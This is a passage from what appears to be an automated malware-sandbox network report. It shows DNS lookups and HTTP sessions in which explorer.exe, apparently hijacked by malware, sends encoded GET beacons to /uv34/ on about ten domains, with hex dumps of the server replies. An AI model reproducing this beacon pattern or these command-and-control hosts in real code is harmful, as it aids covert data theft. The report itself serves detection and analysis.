May 12, 2021 08:42:41.084408045 CEST	192.168.2.6	8.8.8.8	0x9478	Standard query (0)	www.albanyhumanesociety.net	A (IP address)	IN (0x0001)
May 12, 2021 08:42:46.347724915 CEST	192.168.2.6	8.8.8.8	0x9b22	Standard query (0)	www.helenafinaltouch.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.731790066 CEST	192.168.2.6	8.8.8.8	0x1090	Standard query (0)	www.sandybottomsflipflops.com	A (IP address)	IN (0x0001)
May 12, 2021 08:42:57.204747915 CEST	192.168.2.6	8.8.8.8	0x59d2	Standard query (0)	www.hysjs168.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 08:41:47.982878923 CEST	8.8.8.8	192.168.2.6	0xb15	No error (0)	www.contorig2.com		199.192.23.253	A (IP address)	IN (0x0001)
May 12, 2021 08:41:53.532840967 CEST	8.8.8.8	192.168.2.6	0x7f6d	No error (0)	www.muldentaxi.com		64.190.62.111	A (IP address)	IN (0x0001)
May 12, 2021 08:41:58.726906061 CEST	8.8.8.8	192.168.2.6	0x94d9	No error (0)	www.gofourd.com	gofourd.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:41:58.726906061 CEST	8.8.8.8	192.168.2.6	0x94d9	No error (0)	gofourd.com		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 08:42:04.036597967 CEST	8.8.8.8	192.168.2.6	0xeeb7	No error (0)	www.ihdeuruim.com	www.ihdeuruim.com.ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:42:04.036597967 CEST	8.8.8.8	192.168.2.6	0xeeb7	No error (0)	www.ihdeuruim.com.ghs.googlehosted.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:42:04.036597967 CEST	8.8.8.8	192.168.2.6	0xeeb7	No error (0)	ghs.googlehosted.com		172.217.168.83	A (IP address)	IN (0x0001)
May 12, 2021 08:42:09.249818087 CEST	8.8.8.8	192.168.2.6	0xc56	No error (0)	www.embraceblm.com	embraceblm.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:42:09.249818087 CEST	8.8.8.8	192.168.2.6	0xc56	No error (0)	embraceblm.com		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 08:42:14.686325073 CEST	8.8.8.8	192.168.2.6	0x26ee	No error (0)	www.ytksw.com		45.39.20.158	A (IP address)	IN (0x0001)
May 12, 2021 08:42:20.357342958 CEST	8.8.8.8	192.168.2.6	0xfde1	No error (0)	www.buraktradingltd.com		173.236.152.151	A (IP address)	IN (0x0001)
May 12, 2021 08:42:25.717556953 CEST	8.8.8.8	192.168.2.6	0x60ad	No error (0)	www.bogolacke.com	bogolacke.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:42:25.717556953 CEST	8.8.8.8	192.168.2.6	0x60ad	No error (0)	bogolacke.com		160.153.132.205	A (IP address)	IN (0x0001)
May 12, 2021 08:42:30.925359011 CEST	8.8.8.8	192.168.2.6	0xbd0c	Name error (3)	www.soccer-yokouchi.club	none	none	A (IP address)	IN (0x0001)
May 12, 2021 08:42:36.062607050 CEST	8.8.8.8	192.168.2.6	0x73fb	Name error (3)	www.maraitime.com	none	none	A (IP address)	IN (0x0001)
May 12, 2021 08:42:41.155487061 CEST	8.8.8.8	192.168.2.6	0x9478	No error (0)	www.albanyhumanesociety.net	albanyhumanesociety.net		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:42:41.155487061 CEST	8.8.8.8	192.168.2.6	0x9478	No error (0)	albanyhumanesociety.net		34.102.136.180	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	www.sandybottomsflipflops.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
May 12, 2021 08:42:51.793900967 CEST	8.8.8.8	192.168.2.6	0x1090	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
May 12, 2021 08:42:57.513603926 CEST	8.8.8.8	192.168.2.6	0x59d2	No error (0)	www.hysjs168.com		182.61.46.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.contorig2.com

www.muldentaxi.com

www.gofourd.com

www.ihdeuruim.com

www.embraceblm.com

www.ytksw.com

www.buraktradingltd.com

www.bogolacke.com

www.albanyhumanesociety.net

www.sandybottomsflipflops.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49731	199.192.23.253	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:41:48.185560942 CEST	2172	OUT	GET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1 Host: www.contorig2.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:41:48.454969883 CEST	2180	IN	HTTP/1.1 404 Not Found Date: Wed, 12 May 2021 06:41:48 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 328 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 76 33 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uv34/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49734	64.190.62.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:41:53.579425097 CEST	2273	OUT	GET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1 Host: www.muldentaxi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:41:53.655127048 CEST	2300	IN	HTTP/1.1 302 Found date: Wed, 12 May 2021 06:41:53 GMT content-type: text/html; charset=UTF-8 content-length: 0 x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_A8DzZfUNWnmyCgQkFEETWRyarn4GoD9jEfHJZQlHNvNvxDaUboNE7XItYz4j+wmkHTlV46ISip98njl/xfs3hQ== expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache last-modified: Wed, 12 May 2021 06:41:53 GMT location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=muldentaxi.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage x-cache-miss-from: parking-5cc4cbb56f-qzncz server: NginX connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49737	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:41:58.769610882 CEST	5591	OUT	GET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1 Host: www.gofourd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:41:58.906670094 CEST	6134	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 06:41:58 GMT Content-Type: text/html Content-Length: 275 ETag: "60995c49-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49738	172.217.168.83	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:04.093743086 CEST	6156	OUT	GET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1 Host: www.ihdeuruim.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:42:04.168349028 CEST	6157	IN	HTTP/1.1 404 Not Found Date: Wed, 12 May 2021 06:42:04 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1665 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2
May 12, 2021 08:42:04.168392897 CEST	6158	IN	Data Raw: 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 Data Ascii: ){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49739	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:09.292547941 CEST	6159	OUT	GET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1 Host: www.embraceblm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:42:09.429548025 CEST	6159	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 06:42:09 GMT Content-Type: text/html Content-Length: 275 ETag: "609953af-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49740	45.39.20.158	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:14.893963099 CEST	6160	OUT	GET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1 Host: www.ytksw.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:42:15.098475933 CEST	6160	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 12 May 2021 06:42:15 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49744	173.236.152.151	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:20.500356913 CEST	6170	OUT	GET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1 Host: www.buraktradingltd.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:42:20.640997887 CEST	6171	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 12 May 2021 06:42:20 GMT Server: Apache Location: https://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== Content-Length: 344 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 72 61 6b 74 72 61 64 69 6e 67 6c 74 64 2e 63 6f 6d 2f 75 76 33 34 2f 3f 5f 4a 42 3d 53 4c 33 64 32 4c 38 26 61 6d 70 3b 44 30 44 68 6a 3d 44 37 35 4f 73 44 6c 54 48 6d 61 34 6e 43 74 2f 58 48 68 56 51 54 76 65 64 48 76 71 4a 56 65 6a 33 43 45 47 4e 6e 46 64 64 42 73 30 35 66 48 45 76 47 30 39 49 69 74 51 46 56 52 6f 6a 56 4a 72 2f 54 6b 4a 78 4a 48 6c 59 67 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49745	160.153.132.205	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 08:42:25.770747900 CEST	6173	OUT	GET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1 Host: www.bogolacke.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 08:42:25.841358900 CEST	6174	IN	HTTP/1.1 404 Not Found Date: Wed, 12 May 2021 06:42:25 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Length: 1699 Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 